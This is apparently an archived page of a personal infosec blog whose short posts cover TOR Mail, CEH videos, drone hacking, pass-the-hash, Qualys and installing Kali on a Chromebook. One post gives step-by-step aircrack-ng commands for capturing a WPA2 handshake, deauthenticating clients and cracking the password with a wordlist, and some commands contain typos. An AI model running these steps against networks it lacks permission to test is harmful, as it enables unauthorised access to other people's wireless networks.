TOR Mail

I’m sure people used TOR Mail because they thought they were completely anonymous. But there are side channel attacks, like asking France for a particular server.

Posted in Security Blog | Tagged , , , , | Comments Off on TOR Mail

CEH Beginner Videos

I found this on Youtube by searching for CEH.

The slides, I have begun, are just run in the background, just so I can listen while I do other things.

In recent news, the EC Council was defaced. (February 23rd, 2014)

Posted in Security Blog | Tagged , , | Comments Off on CEH Beginner Videos

Breaking Wireless WPA2

You’ll need

  • Backtrack with metasploit
  • airmon-ng
  • airodump-ng
  • aireplay-ng
  • aircrack

Verify your wireless is up,

airmon-ng start wlan0

airodump-ng mon0

Find a BSSID MAC address to become a toe (target of evaluation)

Stop the program
Gather the MAC address and Channel which you will use in the command below.

type
airodump-ng -w MyFile -c 1 –bssid MA:CA:DD:RE:SS mon0

while that is running
clone your terminal session and run
aireply-ng -0 – -a MA:CA:DD:RE:SS mon0
to send deauth
after 30 seconds, ^C out

Go back to your normal terminal session
About a minute should have passed
^C out of that program

now dictionary attack the MyFile you created.
type
aircrack-ng MyFile-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

Now we wait. If your password is weak, chances are, it will be cracked here and shown to you.

Perform this on your own network or on a network you have written permission to try it on.

Here is a video that shows exactly the steps above.

Posted in Security Blog | Tagged , , , , , , , , , , , , | Comments Off on Breaking Wireless WPA2

Drone Hacking with SkyJack

Samy Kamkar (creator of the Samy worm) has an awesome video on his program, Skyjack: Autonomous Drone Hacking.

Here is Samy’s page on how to perform a skyjack attack. He lists the entire inventory with Amazon links to hardware so you can support his efforts on advancements toward fighting robots when they become self-aware (the singularity) and try to eliminate humans. ;)

http://samy.pl/skyjack/

Samy is a genius, read the entry on Wikipedia about him.

Posted in Security Blog | Tagged , , , , , , , , , , , , , | Comments Off on Drone Hacking with SkyJack

Pass the Hash on Windows 8.1

LCBhash2

On this website are instructions on how to pass the hash on Windows 8.1. Microsoft claimed that they patched the Pass the Hash exploit in October of 2013.

Of course this is a proof of concept and some of the instructions require disabling services such as Windows Defender.

As a reminder, please only perform such testing on systems you either own or have written permission to test on.

See this great explanation of what a hash is.

Posted in Security Blog | Tagged , , , , | Comments Off on Pass the Hash on Windows 8.1

QualysGuard

qualysSlide

Need to learn Qualys? They offer free training on their website in video format.

What is QualysGuard you ask? It’s basically a network scanning tool to scan networks to discover new or existing devices, perform compliance and vulnerability checks, and offer reporting. It is a good tool to have.

Posted in Security Blog | Tagged , , , , , , , | Comments Off on QualysGuard

Scottsdale Family Fun Day

Pat Spinning

Almost every year, Scottsdale Insurance Company has a large picnic over at McCormick ranch and Jaime gets to bring up to 5 people. Damien didn’t want to go, but Pat and Courtney did. We had a lot of fun. We got to see our friends, Camille, Randy, Karie, Lorie, and all the kids.

I got to play with my quadcopter a lot and then I was done once I stuck it into a tree and had to climb it to get it.

[AFG_gallery id=’24’]

Posted in life | Comments Off on Scottsdale Family Fun Day

Nigerian Scams

Don’t fall for this…

 

 

Nigerian Scams

Posted in Security Blog | Tagged , , , , | Comments Off on Nigerian Scams

My InfoSec Board on Pinterest

Follow It’s Carmelo!’s board Infosec on Pinterest.

Posted in Security Blog | Tagged , | Comments Off on My InfoSec Board on Pinterest

Installing Crouton and Kali on a Chromebook

Chromebook Installing kali

Crouton is short for the Chromium OS Universal Chroot Environment. The below instruction will allow you to install two separate OSs on your Chromebook and allow for switching in between them (AND they will have a shared folder, downloads, to move data back and forth.)

Kali is the successor to backtrack and if you don’t know what that is, well, perhaps this page isn’t for you, but I will guide you to where you can read more: http://www.kali.org/

Follow these steps to install crouton and kali on a chromebook.
Save everything you stored locally into your Google Drive.
From the desktop, press
Escape Refresh and Power
Press
Control D
don’t press anything.
Just wait, it will beep in two beep bursts, twice.

It will reboot and beep.
Go through set up, choosing your wlan and log in to your google account.
Once done, visit
https://github.com/dnschneid/crouton
and download this file http://goo.gl/fd3zc

Now access the terminal by pressing Control Alt t
type
shell
and press enter

type
sudo sh -e ~/Downloads/crouton -r kali -t kde -n kali

Credit to http://grephaxs.com/chromebook-install-kali-with-crouton/ on the kali Linux bit

Once install is complete, type
sudo startkde

You can now switch between each OS by pressing Control Alt Shift and the arrow keys above the 1-2 and 2-3.
Photos below are taken 1 minute apart.

20140218_19105420140218_191114

kali linux with kde kinda sucks though, and it doesn’t include all the cool tools (read: metasploit) that kali is known for as the successor to backtrack. But it is a starting point. Once I find an ARM package to install metasploit, I’ll post that too.

Posted in Security Blog | Tagged , , , , , | Comments Off on Installing Crouton and Kali on a Chromebook